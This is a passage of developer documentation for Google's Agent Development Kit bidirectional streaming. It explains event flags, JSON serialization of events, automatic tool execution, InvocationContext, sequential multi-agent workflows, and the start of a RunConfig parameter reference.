**once** at the very end of the model's complete response, in a **separate event** - You may receive: `partial=False` (sentence 1) → `partial=False` (sentence 2) → `turn_complete=True` - The merged text event (`partial=False` with content) is always yielded **before** the `turn_complete=True` event Note ADK internally accumulates all text from `partial=True` events. When you receive an event with `partial=False`, the text content equals the sum of all preceding `partial=True` chunks. 
This means: - You can safely ignore all `partial=True` events and only process `partial=False` events if you don't need streaming display - If you do display `partial=True` events, the `partial=False` event provides the complete merged text for validation or storage - This accumulation is handled automatically by ADK's `StreamingResponseAggregator`—you don't need to manually concatenate partial text chunks #### Handling `interrupted` Flag This enables natural conversation flow by detecting when users interrupt the model mid-response, allowing you to stop rendering outdated content immediately. When users send new input while the model is still generating a response (common in voice conversations), you'll receive an event with `interrupted=True`: **Usage:** ```python async for event in runner.run_live(...): if event.interrupted: # Your logic to stop displaying partial text and clear typing indicators stop_streaming_display() # Your logic to show interruption in UI (optional) show_user_interruption_indicator() ``` **Example - Interruption Scenario:** ```text Model: "The weather in San Francisco is currently..." User: [interrupts] "Actually, I meant San Diego" → event.interrupted=True received → Your app: stop rendering model response, clear UI → Model processes new input Model: "The weather in San Diego is..." ``` **When to use interruption handling:** - **Voice conversations**: Stop audio playback immediately when user starts speaking - **Clear UI state**: Remove typing indicators and partial text displays - **Conversation logging**: Mark which responses were interrupted (incomplete) - **User feedback**: Show visual indication that interruption was recognized #### Handling `turn_complete` Flag This signals conversation boundaries, allowing you to update UI state (enable input controls, hide indicators) and mark proper turn boundaries in logs and analytics. 
When the model finishes its complete response, you'll receive an event with `turn_complete=True`: **Usage:** ```python async for event in runner.run_live(...): if event.turn_complete: # Your logic to update UI to show "ready for input" state enable_user_input() # Your logic to hide typing indicator hide_typing_indicator() # Your logic to mark conversation boundary in logs log_turn_boundary() ``` **Event Flag Combinations:** Understanding how `turn_complete` and `interrupted` combine helps you handle all conversation states: | Scenario | turn_complete | interrupted | Your App Should | | ----------------------------- | ------------- | ----------- | ---------------------------------------- | | Normal completion | True | False | Enable input, show "ready" state | | User interrupted mid-response | False | True | Stop display, clear partial content | | Interrupted at end | True | True | Same as normal completion (turn is done) | | Mid-response (partial text) | False | False | Continue displaying streaming text | **Implementation:** ```python async for event in runner.run_live(...): # Handle streaming text if event.content and event.content.parts and event.content.parts[0].text: if event.partial: # Your logic to show typing indicator and update partial text update_streaming_text(event.content.parts[0].text) else: # Your logic to display complete text chunk display_text(event.content.parts[0].text) # Handle interruption if event.interrupted: # Your logic to stop audio playback and clear indicators stop_audio_playback() clear_streaming_indicators() # Handle turn completion if event.turn_complete: # Your logic to enable user input show_input_ready_state() enable_microphone() ``` **Common Use Cases:** - **UI state management**: Show/hide "ready for input" indicators, typing animations, microphone states - **Audio playback control**: Know when to stop rendering audio chunks from the model - **Conversation logging**: Mark clear boundaries between turns for history/analytics - 
**Streaming optimization**: Stop buffering when turn is complete **Turn completion and caching:** Audio/transcript caches are flushed automatically at specific points during streaming: - **On turn completion** (`turn_complete=True`): Both user and model audio caches are flushed - **On interruption** (`interrupted=True`): Model audio cache is flushed - **On generation completion**: Model audio cache is flushed ## Serializing Events to JSON ADK `Event` objects are Pydantic models, which means they come with powerful serialization capabilities. The `model_dump_json()` method is particularly useful for streaming events over network protocols like WebSockets or Server-Sent Events (SSE). ### Using event.model_dump_json() This provides a simple one-liner to convert ADK events into JSON format that can be sent over network protocols like WebSockets or SSE. The `model_dump_json()` method serializes an `Event` object to a JSON string: Demo implementation: [main.py:219-234](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L219-L234) ```python async def downstream_task() -> None: """Receives Events from run_live() and sends to WebSocket.""" async for event in runner.run_live( user_id=user_id, session_id=session_id, live_request_queue=live_request_queue, run_config=run_config ): event_json = event.model_dump_json(exclude_none=True, by_alias=True) await websocket.send_text(event_json) ``` **What gets serialized:** - Event metadata (author, server_content fields) - Content (text, audio data, function calls) - Event flags (partial, turn_complete, interrupted) - Transcription data (input_transcription, output_transcription) - Tool execution information **When to use `model_dump_json()`:** - ✅ Streaming events over network (WebSocket, SSE) - ✅ Logging/persistence to JSON files - ✅ Debugging and inspection - ✅ Integration with JSON-based APIs **When NOT to use it:** - ❌ In-memory processing (use event objects 
directly)
- ❌ High-frequency events where serialization overhead matters
- ❌ When you only need a few fields (extract them directly instead)

Performance Warning

Binary audio data in `event.content.parts[].inline_data` will be base64-encoded when serialized to JSON, which increases payload size by roughly 33% (the encoded data is about 133% of the raw size). For production applications with audio, send binary data separately using WebSocket binary frames or multipart HTTP. See [Optimization for Audio Transmission](#optimization-for-audio-transmission) for details.

### Serialization options

Serialization options let you reduce payload sizes by excluding unnecessary fields, which improves network performance and client processing speed.

Pydantic's `model_dump_json()` supports several useful parameters:

**Usage:**

```python
# Exclude None values for smaller payloads (with camelCase field names)
event_json = event.model_dump_json(exclude_none=True, by_alias=True)

# Custom exclusions (e.g., skip large binary audio)
event_json = event.model_dump_json(
    exclude={'content': {'parts': {'__all__': {'inline_data'}}}},
    by_alias=True
)

# Include only specific fields
event_json = event.model_dump_json(
    include={'content', 'author', 'turn_complete', 'interrupted'},
    by_alias=True
)

# Pretty-printed JSON (for debugging)
event_json = event.model_dump_json(indent=2, by_alias=True)
```

The bidi-demo uses `exclude_none=True` to minimize payload size by omitting fields with None values.

### Deserializing on the Client

This section shows how to parse and handle serialized events on the client side, enabling responsive UI updates based on event properties like turn completion and interruptions.
On the client side (JavaScript/TypeScript), parse the JSON back to objects:

Demo implementation: [app.js:339-688](https://github.com/google/adk-samples/blob/2f7b82f182659e0990bfb86f6ef400dd82633c07/python/agents/bidi-demo/app/static/js/app.js#L341-L690)

```javascript
// Handle incoming messages
websocket.onmessage = function (event) {
  // Parse the incoming ADK Event
  const adkEvent = JSON.parse(event.data);

  // Handle turn complete event
  if (adkEvent.turnComplete === true) {
    // Remove typing indicator from current message
    if (currentBubbleElement) {
      const textElement = currentBubbleElement.querySelector(".bubble-text");
      const typingIndicator = textElement.querySelector(".typing-indicator");
      if (typingIndicator) {
        typingIndicator.remove();
      }
    }
    currentMessageId = null;
    currentBubbleElement = null;
    return;
  }

  // Handle interrupted event
  if (adkEvent.interrupted === true) {
    // Stop audio playback if it's playing
    if (audioPlayerNode) {
      audioPlayerNode.port.postMessage({ command: "endOfAudio" });
    }

    // Keep the partial message but mark it as interrupted
    if (currentBubbleElement) {
      const textElement = currentBubbleElement.querySelector(".bubble-text");

      // Remove typing indicator
      const typingIndicator = textElement.querySelector(".typing-indicator");
      if (typingIndicator) {
        typingIndicator.remove();
      }

      // Add interrupted marker
      currentBubbleElement.classList.add("interrupted");
    }

    currentMessageId = null;
    currentBubbleElement = null;
    return;
  }

  // Handle content events (text or audio)
  if (adkEvent.content && adkEvent.content.parts) {
    const parts = adkEvent.content.parts;

    for (const part of parts) {
      // Handle text
      if (part.text) {
        // Add a new message bubble for a new turn
        if (currentMessageId == null) {
          currentMessageId = Math.random().toString(36).substring(7);
          currentBubbleElement = createMessageBubble(part.text, false, true);
          currentBubbleElement.id = currentMessageId;
          messagesDiv.appendChild(currentBubbleElement);
        } else {
          // Update the existing message bubble with accumulated text
          const existingText = currentBubbleElement.querySelector(".bubble-text").textContent;
          const cleanText = existingText.replace(/\.\.\.$/, '');
          updateMessageBubble(currentBubbleElement, cleanText + part.text, true);
        }
        scrollToBottom();
      }
    }
  }
};
```

Demo Implementation

See the complete WebSocket message handler in [`app.js:339-688`](https://github.com/google/adk-samples/blob/2f7b82f182659e0990bfb86f6ef400dd82633c07/python/agents/bidi-demo/app/static/js/app.js#L341-L690)

### Optimization for Audio Transmission

Base64-encoded binary audio in JSON significantly increases payload size. For production applications, use a single WebSocket connection with both binary frames (for audio) and text frames (for metadata):

**Usage:**

```python
async for event in runner.run_live(...):
    # Check for binary audio
    has_audio = (
        event.content and
        event.content.parts and
        any(p.inline_data for p in event.content.parts)
    )

    if has_audio:
        # Send audio via binary WebSocket frame
        for part in event.content.parts:
            if part.inline_data:
                await websocket.send_bytes(part.inline_data.data)

        # Send metadata only (much smaller)
        metadata_json = event.model_dump_json(
            exclude={'content': {'parts': {'__all__': {'inline_data'}}}},
            by_alias=True
        )
        await websocket.send_text(metadata_json)
    else:
        # Text-only events can be sent as JSON
        await websocket.send_text(event.model_dump_json(exclude_none=True, by_alias=True))
```

This approach avoids the base64 encoding overhead on audio payloads (roughly one third of the raw audio size) while maintaining full event metadata. The actual bandwidth saving depends on how much of your stream is audio.

## Automatic Tool Execution in run_live()

Source Reference

See automatic tool execution implementation in [`functions.py`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/flows/llm_flows/functions.py)

One of the most powerful features of ADK's `run_live()` is **automatic tool execution**. Unlike the raw Gemini Live API, which requires you to manually handle tool calls and responses, ADK abstracts this complexity entirely.
### The Challenge with Raw Live API

When using the Gemini Live API directly (without ADK), tool use requires manual orchestration:

1. **Receive** function calls from the model
1. **Execute** the tools yourself
1. **Format** function responses correctly
1. **Send** responses back to the model

This creates significant implementation overhead, especially in streaming contexts where you need to handle multiple concurrent tool calls, manage errors, and coordinate with ongoing audio/text streams.

### How ADK Simplifies Tool Use

With ADK, tool execution becomes declarative. Simply define tools on your Agent:

Demo implementation: [agent.py:11-16](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/google_search_agent/agent.py#L11-L16)

```python
import os
from google.adk.agents import Agent
from google.adk.tools import google_search

agent = Agent(
    name="google_search_agent",
    model=os.getenv("DEMO_AGENT_MODEL", "gemini-2.5-flash-native-audio-preview-12-2025"),
    tools=[google_search],
    instruction="You are a helpful assistant that can search the web."
)
```

When you call `runner.run_live()`, ADK automatically:

- **Detects** when the model returns function calls in streaming responses
- **Executes** tools in parallel for maximum performance
- **Handles** before/after tool callbacks for custom logic
- **Formats** function responses according to Live API requirements
- **Sends** responses back to the model seamlessly
- **Yields** both function call and response events to your application

### Tool Execution Events

When tools execute, you'll receive events through the `run_live()` async generator:

**Usage:**

```python
async for event in runner.run_live(...):
    # Function call event - model requesting tool execution
    if event.get_function_calls():
        print(f"Model calling: {event.get_function_calls()[0].name}")

    # Function response event - tool execution result
    if event.get_function_responses():
        print(f"Tool result: {event.get_function_responses()[0].response}")
```

You don't need to handle the execution yourself; ADK does it automatically. You just observe the events as they flow through the conversation.

**Learn More:** The bidi-demo sends all events (including function calls and responses) directly to the WebSocket client without server-side filtering. This allows the client to observe tool execution in real-time through the event stream. See the downstream task in [`main.py:219-234`](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L219-L234)

### Long-Running and Streaming Tools

ADK supports advanced tool patterns that integrate seamlessly with `run_live()`:

**Long-Running Tools**: Tools that require human approval or take extended time to complete. Mark them with `is_long_running=True`. In resumable async flows, ADK can pause after long-running calls. In live flows, streaming continues; `long_running_tool_ids` indicate pending operations and clients can display appropriate UI.
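To make the `long_running_tool_ids` idea concrete, here is a minimal sketch of how a client-facing layer might pick out pending operations from an event. It runs without ADK: `FakeEvent` and `FakeFunctionCall` are hypothetical stand-ins that expose only the attributes read here, and `pending_long_running_calls` is an illustrative helper, not part of ADK.

```python
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class FakeFunctionCall:
    """Hypothetical stand-in for a function call (only id and name are used)."""
    id: str
    name: str


@dataclass
class FakeEvent:
    """Hypothetical stand-in exposing only what this sketch reads from an event."""
    function_calls: list = field(default_factory=list)
    long_running_tool_ids: Optional[set] = None

    def get_function_calls(self):
        return self.function_calls


def pending_long_running_calls(event) -> list:
    """Return the names of function calls whose IDs are marked long-running."""
    pending_ids = event.long_running_tool_ids or set()
    return [
        call.name
        for call in event.get_function_calls()
        if call.id in pending_ids
    ]


event = FakeEvent(
    function_calls=[
        FakeFunctionCall(id="call-1", name="google_search"),
        FakeFunctionCall(id="call-2", name="request_approval"),
    ],
    long_running_tool_ids={"call-2"},
)
print(pending_long_running_calls(event))
```

A UI could use the returned names to show a "waiting for approval" indicator while the stream keeps flowing.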
**Streaming Tools**: Tools that accept an `input_stream` parameter with type `LiveRequestQueue` can send real-time updates back to the model during execution, enabling progressive responses.

**How Streaming Tools Work**

When you call `runner.run_live()`, ADK inspects your agent's tools at initialization (lines 828-865 in `runners.py`) to identify streaming tools by checking parameter type annotations for `LiveRequestQueue`.

**Queue creation and lifecycle**:

1. **Creation**: ADK creates an `ActiveStreamingTool` with a dedicated `LiveRequestQueue` for each streaming tool at the start of `run_live()` (before processing any events)
1. **Storage**: These queues are stored in `invocation_context.active_streaming_tools[tool_name]` for the duration of the invocation
1. **Injection**: When the model calls the tool, ADK automatically injects the tool's queue as the `input_stream` parameter (lines 238-253 in `function_tool.py`)
1. **Usage**: The tool can use this queue to send real-time updates back to the model during execution
1. **Lifecycle**: The queues persist for the entire `run_live()` invocation (one InvocationContext = one `run_live()` call) and are destroyed when `run_live()` exits

**Queue distinction**:

- **Main queue** (`live_request_queue` parameter): Created by your application, used for client-to-model communication
- **Tool queues** (`active_streaming_tools[tool_name].stream`): Created automatically by ADK, used for tool-to-model communication during execution

Both types of queues are `LiveRequestQueue` instances, but they serve different purposes in the streaming architecture.

This enables tools to provide incremental updates, progress notifications, or partial results during long-running operations.

**Code reference**: See `runners.py:828-865` (tool detection) and `function_tool.py:238-253` (parameter injection) for implementation details.

See the [Tools Guide](https://google.github.io/adk-docs/tools/) for implementation examples.
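The detection step described above can be illustrated with a small, simplified sketch. It is not ADK's actual code: `LiveRequestQueue` here is a local stand-in class so the example runs without ADK, the two tools are hypothetical, and the dictionary stores bare queues rather than `ActiveStreamingTool` objects.

```python
import inspect


class LiveRequestQueue:
    """Local stand-in for ADK's LiveRequestQueue so the sketch runs without ADK."""


async def monitor_stock(symbol: str, input_stream: LiveRequestQueue):
    """Hypothetical streaming tool: declares an input_stream parameter."""


def get_weather(city: str) -> str:
    """Hypothetical regular tool: no input_stream parameter."""
    return f"Sunny in {city}"


def is_streaming_tool(func) -> bool:
    """True if func has an input_stream parameter annotated as LiveRequestQueue."""
    param = inspect.signature(func).parameters.get("input_stream")
    return param is not None and param.annotation is LiveRequestQueue


# One dedicated queue per streaming tool, keyed by tool name
tools = [monitor_stock, get_weather]
active_streaming_tools = {
    tool.__name__: LiveRequestQueue() for tool in tools if is_streaming_tool(tool)
}
print(sorted(active_streaming_tools))
```

Keying the queues by tool name mirrors the `active_streaming_tools[tool_name]` lookup described above, so the matching queue can be found when the model later calls that tool.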
### Key Takeaway

The difference between raw Live API tool use and ADK is stark:

| Aspect                    | Raw Live API                    | ADK `run_live()`                |
| ------------------------- | ------------------------------- | ------------------------------- |
| **Tool Declaration**      | Manual schema definition        | Automatic from Python functions |
| **Tool Execution**        | Manual handling in app code     | Automatic parallel execution    |
| **Response Formatting**   | Manual JSON construction        | Automatic                       |
| **Error Handling**        | Manual try/catch and formatting | Automatic capture and reporting |
| **Streaming Integration** | Manual coordination             | Automatic event yielding        |
| **Developer Experience**  | Complex, error-prone            | Declarative, simple             |

This automatic handling is one of the core value propositions of ADK: it transforms the complexity of Live API tool use into a simple, declarative developer experience.

## InvocationContext: The Execution State Container

**Source Reference:** See InvocationContext implementation in [`invocation_context.py`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/agents/invocation_context.py)

While `run_live()` returns an AsyncGenerator for consuming events, internally it creates and manages an `InvocationContext`, ADK's unified state carrier that encapsulates everything needed for a complete conversation invocation. **One InvocationContext corresponds to one `run_live()` loop**: it's created when you call `run_live()` and persists for the entire streaming session.

Think of it as a traveling notebook that accompanies a conversation from start to finish, collecting information, tracking progress, and providing context to every component along the way. It's ADK's runtime implementation of the Context concept, providing the execution-time state and services needed during a live conversation. For a broader overview of context in ADK, see [Context in ADK](https://google.github.io/adk-docs/context/).

### What is an Invocation?
An **invocation** represents a complete interaction cycle:

- Starts with user input (text, audio, or control signal)
- May involve one or multiple agent calls
- Ends when a final response is generated or when explicitly terminated
- Is orchestrated by `runner.run_live()` or `runner.run_async()`

This is distinct from an **agent call** (execution of a single agent's logic) and a **step** (a single LLM call plus any resulting tool executions).

The hierarchy looks like this:

```text
   ┌─────────────────────── invocation ──────────────────────────┐
   ┌──────────── llm_agent_call_1 ────────────┐ ┌─ agent_call_2 ─┐
   ┌──── step_1 ────────┐ ┌───── step_2 ──────┐
   [call_llm] [call_tool] [call_llm] [transfer]
```

### Who Uses InvocationContext?

InvocationContext serves different audiences at different levels:

- **ADK's internal components** (primary users): Runner, Agent, LLMFlow, and GeminiLlmConnection all receive, read from, and write to the InvocationContext as it flows through the stack. This shared context enables seamless coordination without tight coupling.
- **Application developers** (indirect beneficiaries): You don't typically create or manipulate InvocationContext directly in your application code. Instead, you benefit from the clean, simplified APIs that InvocationContext enables behind the scenes, like the elegant `async for event in runner.run_live()` pattern.
- **Tool and callback developers** (direct access): When you implement custom tools or callbacks, you receive InvocationContext as a parameter. This gives you direct access to conversation state, session services, and control flags (like `end_invocation`) to implement sophisticated behaviors.

#### What InvocationContext Contains

When you implement custom tools or callbacks, you receive InvocationContext as a parameter.
Here's what's available to you:

**Essential Fields for Tool/Callback Developers:**

- **`context.invocation_id`**: Current invocation identifier (unique per `run_live()` call)
- **`context.session`**:
    - **`context.session.events`**: All events in the session history (across all invocations)
    - **`context.session.state`**: Persistent key-value store for session data
    - **`context.session.user_id`**: User identity
- **`context.run_config`**: Current streaming configuration (response modalities, transcription settings, cost limits)
- **`context.end_invocation`**: Set this to `True` to immediately terminate the conversation (useful for error handling or policy enforcement)

**Example Use Cases in Tool Development:**

```python
from datetime import datetime

from google.adk.agents.invocation_context import InvocationContext
from google.genai import types


# Example: Comprehensive tool implementation showing common InvocationContext patterns
# Note: `process_query` and `data` are placeholders for your own logic and payload.
# The function is async because it awaits the artifact service.
async def my_tool(context: InvocationContext, query: str):
    # Access user identity
    user_id = context.session.user_id

    # Check if this is the user's first message
    event_count = len(context.session.events)
    if event_count == 0:
        return "Welcome! This is your first message."

    # Access conversation history
    recent_events = context.session.events[-5:]  # Last 5 events

    # Access persistent session state
    # Session state persists across invocations (not just this streaming session)
    user_preferences = context.session.state.get('user_preferences', {})

    # Update session state (will be persisted)
    context.session.state['last_query_time'] = datetime.now().isoformat()

    # Access services for persistence
    if context.artifact_service:
        # Store large files/audio
        data = b"..."  # Placeholder: bytes produced by your tool
        await context.artifact_service.save_artifact(
            app_name=context.session.app_name,
            user_id=context.session.user_id,
            session_id=context.session.id,
            filename="result.bin",
            artifact=types.Part(inline_data=types.Blob(mime_type="application/octet-stream", data=data)),
        )

    # Process the query with context
    result = process_query(query, context=recent_events, preferences=user_preferences)

    # Terminate conversation in specific scenarios
    if result.get('error'):
        # Processing error - stop conversation
        context.end_invocation = True

    return result
```

Understanding InvocationContext is essential for grasping how ADK maintains state, coordinates execution, and enables advanced features like multi-agent workflows and resumability. Even if you never touch it directly, knowing what flows through your application helps you design better agents and debug issues more effectively.

## Best Practices for Multi-Agent Workflows

ADK's bidirectional streaming supports three agent architectures: **single agent** (one agent handles the entire conversation), **multi-agent with sub-agents** (a coordinator agent dynamically routes to specialist agents using `transfer_to_agent`), and **sequential workflow agents** (agents execute in a fixed pipeline using `task_completed`). This section focuses on best practices for sequential workflows, where understanding agent transitions and state sharing is crucial for smooth BIDI communication.
**Learn More:** For comprehensive coverage of multi-agent patterns, see [Workflow Agents as Orchestrators](https://google.github.io/adk-docs/agents/multi-agents/#workflow-agents-as-orchestrators) in the ADK documentation.

### SequentialAgent with BIDI Streaming

`SequentialAgent` enables workflow pipelines where agents execute one after another. Each agent completes its task before the next one begins. The challenge with live streaming is determining when an agent has finished processing continuous audio or video input.

**Source Reference:** See SequentialAgent implementation in [`sequential_agent.py:119-158`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/agents/sequential_agent.py#L119-L158)

**How it works:**

ADK automatically adds a `task_completed()` function to each agent in the sequence. When the model calls this function, it signals completion and triggers the transition to the next agent:

**Usage:**

```python
# SequentialAgent automatically adds this tool to each sub-agent
def task_completed():
    """
    Signals that the agent has successfully completed the user's question or task.
    """
    return 'Task completion signaled.'
```

### Recommended Pattern: Transparent Sequential Flow

The key insight is that **agent transitions happen transparently** within the same `run_live()` event stream. Your application doesn't need to manage transitions; just consume events uniformly:

**Usage:**

```python
import asyncio

from google.adk.agents.live_request_queue import LiveRequestQueue
from google.genai import types

# `runner`, `microphone`, `play_audio`, and `display_text` are placeholders
# for objects and helpers defined elsewhere in your application.


async def handle_sequential_workflow():
    """Recommended pattern for SequentialAgent with BIDI streaming."""

    # 1. Single queue shared across all agents in the sequence
    queue = LiveRequestQueue()

    # 2. Background task captures user input continuously
    async def capture_user_input():
        while True:
            # Your logic to read audio from microphone
            audio_chunk = await microphone.read()
            queue.send_realtime(
                blob=types.Blob(data=audio_chunk, mime_type="audio/pcm")
            )

    input_task = asyncio.create_task(capture_user_input())

    try:
        # 3. Single event loop handles ALL agents seamlessly
        async for event in runner.run_live(
            user_id="user_123",
            session_id="session_456",
            live_request_queue=queue,
        ):
            # Events flow seamlessly across agent transitions
            current_agent = event.author

            # Handle audio and text output
            if event.content and event.content.parts:
                for part in event.content.parts:
                    # Check for audio data
                    if part.inline_data and part.inline_data.mime_type.startswith("audio/"):
                        # Your logic to play audio
                        await play_audio(part.inline_data.data)

                    # Check for text data
                    if part.text:
                        await display_text(f"[{current_agent}] {part.text}")

            # No special transition handling needed!

    finally:
        input_task.cancel()
        queue.close()
```

### Event Flow During Agent Transitions

Here's what your application sees when agents transition:

```text
# Agent 1 (Researcher) completes its work
Event: author="researcher", text="I've gathered all the data."
Event: author="researcher", function_call: task_completed()
Event: author="researcher", function_response: task_completed

# --- Automatic transition (invisible to your code) ---

# Agent 2 (Writer) begins
Event: author="writer", text="Let me write the report based on the research..."
Event: author="writer", text=" The findings show..."
Event: author="writer", function_call: task_completed()
Event: author="writer", function_response: task_completed

# --- Automatic transition ---

# Agent 3 (Reviewer) begins - the last agent in sequence
Event: author="reviewer", text="Let me review the report..."
Event: author="reviewer", text="The report looks good. All done!"
Event: author="reviewer", function_call: task_completed()
Event: author="reviewer", function_response: task_completed

# --- Last agent completed: run_live() exits ---
# Your async for loop ends here
```

### Design Principles

#### 1. Single Event Loop

Use one event loop for all agents in the sequence:

**Usage:**

```python
# ✅ CORRECT: One loop handles all agents
async for event in runner.run_live(...):
    # Your event handling logic here
    await handle_event(event)  # Works for Agent1, Agent2, Agent3...

# ❌ INCORRECT: Don't break the loop or create multiple loops
for agent in agents:
    async for event in runner.run_live(...):  # WRONG!
        ...
```

#### 2. Persistent Queue

The same `LiveRequestQueue` serves all agents:

```text
# User input flows to whichever agent is currently active
User speaks → Queue → Agent1 (researcher)
                ↓
User speaks → Queue → Agent2 (writer)
                ↓
User speaks → Queue → Agent3 (reviewer)
```

**Don't create new queues per agent:**

```python
# ❌ INCORRECT: New queue per agent
for agent in agents:
    new_queue = LiveRequestQueue()  # WRONG!

# ✅ CORRECT: Single queue for entire workflow
queue = LiveRequestQueue()
async for event in runner.run_live(live_request_queue=queue):
    ...
```

#### 3. Agent-Aware UI (Optional)

Track which agent is active for better user experience:

**Usage:**

```python
current_agent_name = None

async for event in runner.run_live(...):
    # Detect agent transitions
    if event.author and event.author != current_agent_name:
        current_agent_name = event.author
        # Your logic to update UI indicator
        await update_ui_indicator(f"Now: {current_agent_name}")

    # Your event handling logic here
    await handle_event(event)
```

#### 4. Transition Notifications

Optionally notify users when agents hand off:

**Usage:**

```python
async for event in runner.run_live(...):
    # Detect task completion (transition signal)
    if event.content and event.content.parts:
        for part in event.content.parts:
            if (part.function_response and
                    part.function_response.name == "task_completed"):
                # Your logic to display transition notification
                await display_notification(
                    f"✓ {event.author} completed. Handing off to next agent..."
                )
                continue

    # Your event handling logic here
    await handle_event(event)
```

### Key Differences: transfer_to_agent vs task_completed

Understanding these two functions helps you choose the right multi-agent pattern:

| Function            | Agent Pattern                 | When `run_live()` Exits                                          | Use Case                                  |
| ------------------- | ----------------------------- | ---------------------------------------------------------------- | ----------------------------------------- |
| `transfer_to_agent` | Coordinator (dynamic routing) | `LiveRequestQueue.close()`                                       | Route user to specialist based on intent  |
| `task_completed`    | Sequential (pipeline)         | `LiveRequestQueue.close()` or `task_completed` of the last agent | Fixed workflow: research → write → review |

**transfer_to_agent example:**

```text
# Coordinator routes based on user intent
User: "I need help with billing"
Event: author="coordinator", function_call: transfer_to_agent(agent_name="billing")
# Stream continues with billing agent - same run_live() loop
Event: author="billing", text="I can help with your billing question..."
```

**task_completed example:**

```text
# Sequential workflow progresses through pipeline
Event: author="researcher", function_call: task_completed()
# Current agent exits, next agent in sequence begins
Event: author="writer", text="Based on the research..."
```

### Best Practices Summary

| Practice                                | Reason                                    |
| --------------------------------------- | ----------------------------------------- |
| Use single event loop                   | ADK handles transitions internally        |
| Keep queue alive across agents          | Same queue serves all sequential agents   |
| Track `event.author`                    | Know which agent is currently responding  |
| Don't reset session/context             | Conversation state persists across agents |
| Handle events uniformly                 | All agents produce the same event types   |
| Let `task_completed` signal transitions | Don't manually manage sequential flow     |

The SequentialAgent design ensures smooth transitions: your application simply sees a continuous stream of events from different agents in sequence, with automatic handoffs managed by ADK.

## Summary

In this part, you mastered event handling in ADK's Bidi-streaming architecture. We explored the different event types that agents generate (text responses, audio chunks, transcriptions, tool calls, and control signals) and learned how to process each event type effectively. You now understand how to handle interruptions and turn completion signals for natural conversation flow, serialize events for network transport using Pydantic's model serialization, leverage ADK's automatic tool execution to simplify agent workflows, and access InvocationContext for advanced state management scenarios. With these event handling patterns in place, you're equipped to build responsive streaming applications that provide real-time feedback to users. Next, you'll learn how to configure sophisticated streaming behaviors through RunConfig, including multimodal interactions, session resumption, and cost controls.
______________________________________________________________________

← [Previous: Part 2: Sending Messages with LiveRequestQueue](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md) | [Next: Part 4: Understanding RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/index.md) →

# Part 4: Understanding RunConfig

In Part 3, you learned how to handle events from `run_live()` to process model responses, tool calls, and streaming updates. This part shows you how to configure those streaming sessions through `RunConfig`, controlling response formats, managing session lifecycles, and enforcing production constraints.

**What you'll learn**: This part covers response modalities and their constraints, explores the differences between BIDI and SSE streaming modes, examines the relationship between ADK Sessions and Live API sessions, and shows how to manage session duration with session resumption and context window compression. You'll understand how to handle concurrent session quotas, implement architectural patterns for quota management, and configure cost controls through `max_llm_calls` and audio persistence options. With RunConfig mastery, you can build production-ready streaming applications that balance feature richness with operational constraints.

**Learn More:** For detailed information about audio/video related `RunConfig` configurations, see [Part 5: Audio, Image and Video in Live API](https://google.github.io/adk-docs/streaming/dev-guide/part5/index.md).
## RunConfig Parameter Quick Reference

This table provides a quick reference for all RunConfig parameters covered in this part:

| Parameter | Type | Purpose | Platform Support | Reference |
| --- | --- | --- | --- | --- |
| **response_modalities** | list[str] | Control output format (TEXT or AUDIO) | Both | [Details](#response-modalities) |
| **streaming_mode** | StreamingMode | Choose BIDI or SSE mode | Both | [Details](#streamingmode-bidi-or-sse) |
| **session_resumption** | SessionResumptionConfig | Enable automatic reconnection | Both | [Details](#live-api-session-resumption) |
| **context_window_compression** | ContextWindowCompressionConfig | Unlimited session duration | Both | [Details](#live-api-context-window-compression) |
| **max_llm_calls** | int | Limit total LLM calls per session | Both | [Details](#max_llm_calls) |
| **save_live_blob** | bool | Persist audio/video streams | Both | [Details](#save_live_blob) |
| **custom_metadata** | dict[str, Any] | Attach metadata to invocation events | Both | [Details](#custom_metadata) |
| **support_cfc** | bool | Enable compositional function calling | Gemini (2.x models only) | [Details](#support_cfc-experimental) |
| **speech_config** | SpeechConfig | Voice and language configuration | Both | [Part 5: Voice Configuration](https://google.github.io/adk-docs/streaming/dev-guide/part5/#voice-configuration-speech-config) |
| **input_audio_transcription** | AudioTranscriptionConfig | Transcribe user speech | Both | [Part 5: Audio Transcription](https://google.github.io/adk-docs/streaming/dev-guide/part5/#audio-transcription) |
| **output_audio_transcription** | AudioTranscriptionConfig | Transcribe model speech | Both | [Part 5: Audio Transcription](https://google.github.io/adk-docs/streaming/dev-guide/part5/#audio-transcription) |
| **realtime_input_config** | RealtimeInputConfig | VAD configuration | Both | [Part 5: Voice Activity Detection](https://google.github.io/adk-docs/streaming/dev-guide/part5/#voice-activity-detection-vad) |
| **proactivity** | ProactivityConfig | Enable proactive audio | Gemini (native audio only) | [Part 5: Proactivity and Affective Dialog](https://google.github.io/adk-docs/streaming/dev-guide/part5/#proactivity-and-affective-dialog) |
| **enable_affective_dialog** | bool | Emotional adaptation | Gemini (native audio only) | [Part 5: Proactivity and Affective Dialog](https://google.github.io/adk-docs/streaming/dev-guide/part5/#proactivity-and-affective-dialog) |

**Source Reference:** [`run_config.py`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/agents/run_config.py)

**Platform Support Legend:**

- **Both**: Supported on both Gemini Live API and Vertex AI Live API
- **Gemini**: Only supported on Gemini Live API
- **Model-specific**: Requires specific model architecture (e.g., native audio)

**Import Paths:**

All configuration type classes referenced in the table above are imported from `google.genai.types`:

```python
from google.genai import types
from google.adk.agents.run_config import RunConfig, StreamingMode

# Configuration types are accessed via types module
run_config = RunConfig(
    session_resumption=types.SessionResumptionConfig(),
    context_window_compression=types.ContextWindowCompressionConfig(...),
    speech_config=types.SpeechConfig(...),
    # etc.
)
```

The `RunConfig` class itself and `StreamingMode` enum are imported from `google.adk.agents.run_config`.

## Response Modalities

